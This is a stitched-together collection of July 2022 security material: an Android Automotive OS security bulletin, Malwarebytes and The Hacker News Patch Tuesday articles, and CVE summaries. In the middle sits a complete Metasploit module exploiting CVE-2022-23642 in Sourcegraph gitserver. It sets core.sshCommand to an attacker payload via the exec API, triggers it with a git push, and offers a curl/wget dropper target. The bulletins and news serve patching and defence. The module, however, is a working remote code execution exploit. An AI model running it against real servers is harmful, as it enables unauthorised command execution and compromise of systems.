In Car Settings app, the NotificationAccessConfirmationActivity is exported. In NotificationAccessConfirmationActivity, it gets both 'mComponentName' and 'pkgTitle' from user.An unprivileged app can use a malicous mComponentName with a benign pkgTitle (e.g. Settings app) to make users enable notification access permission for the malicious app. That is, users believe they enable the notification access permission for the Settings app, but actually they enable the notification access permission for the malicious app.Once the malicious app gets the notification access permission, it can read all notifications, including users' personal information.Product: AndroidVersions: Android-12LAndroid ID: A-225189301

_Published July 6, 2022_

The Android Automotive OS (AAOS) Update Bulletin contains details of security vulnerabilities affecting the Android Automotive OS platform. The full AAOS update comprises the security patch level of 2022-07-05 or later from the July 2022 Android Security Bulletin in addition to all issues in this bulletin.

We encourage all customers to accept these updates to their devices.

The most severe of these issues is a high security vulnerability in the AAOS component that could . The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

**Announcements**

*   In addition to the security vulnerabilities described in the July 2022 Android Security Bulletin, the July 2022 Android Automotive OS Update Bulletin also contains patches specifically for AAOS vulnerabilities as described below.

**2022-07-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2022-07-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**AAOS**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2022-20234

A-225189301

ID

High

12L

CVE-2022-20212

A-182282630

EoP

Moderate

10, 11

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, read the instructions on the Google device update schedule.

*   Security patch levels of 2022-07-01 or later address all issues associated with the 2022-07-01 security patch level.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2022-07-01\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2022-07-01 security patch level. Please see this article for more details on how to install security updates.

**2\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**3\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**4\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**5\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.1

July 6, 2022

Bulletin released

CVE-2022-20234: Android Automotive OS Update Bulletin—July 2022  |  Android Open Source Project

A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the commands that are able to be executed through the git exec REST API.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Sourcegraph gitserver sshCommand RCE',        'Description' => %q{          A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute          arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can          then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a          feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the          commands that are able to be executed through the git exec REST API.        },        'Author' => [          'Altelus1', # github PoC          'Spencer McIntyre' # metasploit module        ],        'References' => [          ['CVE', '2022-23642'],          ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'],          ['URL', 'https://github.com/Altelus1/CVE-2022-23642'],        ],        'DisclosureDate' => '2022-02-18', # Public disclosure        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_memory            },          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              # when the OS command is executed, it's executed twice which will cause some of the command stagers to              # be corrupt, these two work even for larger payloads because they're downloaded in a single command              'CmdStagerFlavor' => %w[curl wget],              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper            },          ]        ],        'DefaultOptions' => {          'RPORT' => 3178        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/']),      OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository'])    ])  end  def check    res = send_request_exec(Rex::Text.rand_text_alphanumeric(4..11), ['config', '--default', '', 'core.sshCommand'])    return CheckCode::Unknown unless res    if res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/      # this is the response if the target repo does exist, highly unlikely since it's randomized      return CheckCode::Vulnerable('Successfully set core.sshCommand.')    elsif res.code == 404 && res.body =~ /"cloneInProgress"/      # this is the response if the target repo does not exist      return CheckCode::Vulnerable    elsif res.code == 400 && res.body =~ /^invalid command/      # this is the response when the server is patched, regardless of if there are cloned repos      return CheckCode::Safe    end    CheckCode::Unknown  end  def exploit    if datastore['EXISTING_REPO'].blank?      @git_repo = send_request_list.sample      fail_with(Failure::NotFound, 'Did not identify any cloned repositories on the remote server.') unless @git_repo      print_status("Using automatically identified repository: #{@git_repo}")    else      @git_repo = datastore['EXISTING_REPO']    end    print_status("Executing #{target.name} target")    @git_origin = Rex::Text.rand_text_alphanumeric(4..11)    git_remote = "git@#{Rex::Text.rand_text_alphanumeric(4..11)}:#{Rex::Text.rand_text_alphanumeric(4..11)}.git"    vprint_status("Using #{@git_origin} as a fake git origin")    send_request_exec(@git_repo, ['remote', 'add', @git_origin, git_remote])    case target['Type']    when :unix_memory      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  end  def cleanup    return unless @git_repo && @git_origin    vprint_status('Cleaning up the git changes...')    # delete the remote that was created    send_request_exec(@git_repo, ['remote', 'remove', @git_origin])    # unset the core.sshCommand value    send_request_exec(@git_repo, ['config', '--unset', 'core.sshCommand'])  ensure    super  end  def send_request_exec(repo, args, timeout = 20)    send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'exec'),      'method' => 'POST',      'data' => {        'Repo' => repo,        'Args' => args      }.to_json    }, timeout)  end  def send_request_list    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'list'),      'method' => 'GET',      'vars_get' => { 'cloned' => 'true' }    })    fail_with(Failure::Unreachable, 'No server response.') unless res    fail_with(Failure::UnexpectedReply, 'The gitserver list API call failed.') unless res.code == 200 && res.get_json_document.is_a?(Array)    res.get_json_document  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    res = send_request_exec(@git_repo, ['config', 'core.sshCommand', cmd])    fail_with(Failure::Unreachable, 'No server response.') unless res    unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/      if res.code == 404 && res.get_json_document.is_a?(Hash) && res.get_json_document['cloneInProgress'] == false        fail_with(Failure::BadConfig, 'The specified repository has not been cloned.')      end      fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.')    end    send_request_exec(@git_repo, ['push', @git_origin, 'master'], 5)  endend

Sourcegraph gitserver sshCommand Remote Command Execution

July's Patch Tuesday gives us a lot of important security updates. Most prominently, a known to be exploited vulnerability in Windows CSRSS.
The post Update now—July Patch Tuesday patches include fix for exploited zero-day appeared first on Malwarebytes Labs.

It’s time to triage a lot of patching again. Microsoft’s July Patch Tuesday includes an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). This vulnerability immediately made it to the Cybersecurity & Infrastructure Security Agency (CISA) list of known to be exploited in the wild list that are due for patching by August 2, 2022.

**Microsoft**

In total the Microsoft updates include fixes for 84 vulnerabilities. Four of these vulnerabilities are labelled as “Critical” since they are remote code execution (RCE) vulnerabilities.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that ware assigned to the four Critical vulnerabilities:

CVE-2022-22029: Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.

CVE-2022-22039: Another Windows Network File System (NFS) RCE vulnerability. It’s possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.

CVE-2022-22038: Remote Procedure Call Runtime RCE vulnerability. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.

CVE-2022-30221: Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim’s system in the context of the targeted user.

**Azure Site Recovery**

A huge part of the patches consist of 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. Azure Site Recovery is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.

According to Microsoft, SQL injection vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.

**CVE-2022-22047**

The vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

This type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.

The vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. CSRSS is critical for a system’s operation and is mainly responsible for Win32 console handling and GUI shutdown.

This type of vulnerability are often chained together with others in macros, which makes the decision to roll back Office Macro blocking incomprehensible, even if it is only temporary.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

Adobe released security updates for Acrobat, Character Animator, Photoshop,  Reader, and RoboHelp.

Cisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and several other security updates.

Citrix released hotfixes to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.

Google released Android’s July security updates including 3 labelled as “Critical”.

SAP released its July 2022 Patch Day bulletin with 20 new Security Notes.

VMWare released security updates.

Stay safe, everyone!

Update now—July Patch Tuesday patches include fix for exploited zero-day

Microsoft released its monthly round of Patch Tuesday updates to address 84 new security flaws spanning multiple product categories, counting a zero-day vulnerability that's under active attack in the wild.
Of the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are two other bugs in the Chromium-based Edge browser, one

Microsoft released its monthly round of Patch Tuesday updates to address 84 new security flaws spanning multiple product categories, counting a zero-day vulnerability that's under active attack in the wild.

Of the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are two other bugs in the Chromium-based Edge browser, one of which plugs another zero-day flaw that Google disclosed as being actively exploited in real-world attacks.

Top of the list of this month's updates is CVE-2022-22047 (CVSS score: 7.8), a case of privilege escalation in the Windows Client Server Runtime Subsystem (CSRSS) that could be abused by an attacker to gain SYSTEM permissions.

"With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools," Kev Breen, director of cyber threat research at Immersive Labs, told The Hacker News. "With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly."

Very little is known about the nature and scale of the attacks other than an "Exploitation Detected" assessment from Microsoft. The company's Threat Intelligence Center (MSTIC) and Security Response Center (MSRC) have been credited with reporting the flaw.

Besides CVE-2022-22047, two more elevation of privilege flaws have been fixed in the same component — CVE-2022-22026 (CVSS score: 8.8) and CVE-2022-22049 (CVSS score: 7.8) — that were reported by Google Project Zero researcher Sergei Glazunov.

"A locally authenticated attacker could send specially crafted data to the local CSRSS service to elevate their privileges from AppContainer to SYSTEM," Microsoft said in an advisory for CVE-2022-22026.

"Because the AppContainer environment is considered a defensible security boundary, any process that is able to bypass the boundary is considered a change in Scope. The attacker could then execute code or access resources at a higher integrity level than that of the AppContainer execution environment."

Also remediated by Microsoft include a number of remote code execution bugs in Windows Network File System (CVE-2022-22029 and CVE-2022-22039), Windows Graphics (CVE-2022-30221), Remote Procedure Call Runtime (CVE-2022-22038), and Windows Shell (CVE-2022-30222).

The update further stands out for patching as many as 32 issues in the Azure Site Recovery disaster recovery service. Two of these flaws are related to remote code execution and the remaining 30 concern privilege escalation.

"Successful exploitation \[...\] requires an attacker to compromise admin credentials to one of the VMs associated with the configuration server," the company said, adding the flaws do not "allow disclosure of any confidential information, but could allow an attacker to modify data that could result in the service being unavailable."

On top of that, Microsoft's July update also contains fixes for four privilege escalation vulnerabilities in the Windows Print Spooler module (CVE-2022-22022, CVE-2022-22041, CVE-2022-30206, and CVE-2022-30226) after a brief respite in June 2022, underscoring what appears to be a never-ending stream of flaws plaguing the technology.

Rounding off the Patch Tuesday updates are two notable fixes for tampering vulnerabilities in the Windows Server Service (CVE-2022-30216) and Microsoft Defender for Endpoint (CVE-2022-33637) and three denial-of-service (DoS) flaws in Internet Information Services (CVE-2022-22025 and CVE-2022-22040) and Security Account Manager (CVE-2022-30208).

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Apache Projects
*   Cisco
*   Citrix
*   Dell
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   Intel
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Qualcomm
*   SAP
*   Schneider Electric
*   Siemens, and
*   VMware

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout

Azure Site Recovery Remote Code Execution Vulnerability

CVE-2022-33676

Azure Site Recovery Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-33678.

Azure Site Recovery Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-33676.

CVE-2022-33678

Windows Network File System Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22029.

CVE-2022-22039

Windows Fax Service Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22027.

Tag

#rce